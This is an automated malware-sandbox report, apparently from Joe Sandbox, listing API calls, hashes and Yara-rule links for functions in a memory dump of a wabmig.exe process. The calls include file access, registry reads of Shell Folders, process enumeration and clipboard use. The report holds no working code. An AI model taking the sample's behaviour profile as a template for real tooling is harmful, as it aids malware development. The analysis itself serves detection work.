                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$PointerRead
                                                                            • String ID:
                                                                            • API String ID: 3154509469-0
                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                            Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                            • String ID:
                                                                            • API String ID: 4232544981-0
                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                            Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                            Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FileModuleName
                                                                            • String ID:
                                                                            • API String ID: 3859505661-0
                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                            Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                            Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                            Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                            Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                            Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                            Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                            Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                            Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: EnumNamesResource
                                                                            • String ID:
                                                                            • API String ID: 3334572018-0
                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                            Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                            Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                            Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                            Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                            Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                            • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                            Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004095FC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3655998216-0
                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                            Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00445426
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                            • String ID:
                                                                            • API String ID: 1828521557-0
                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                            Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                            • String ID:
                                                                            • API String ID: 2136311172-0
                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                            Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@
                                                                            • String ID:
                                                                            • API String ID: 1936579350-0
                                                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                            Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                            Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                            Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                            Non-executed Functions

                                                                            Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
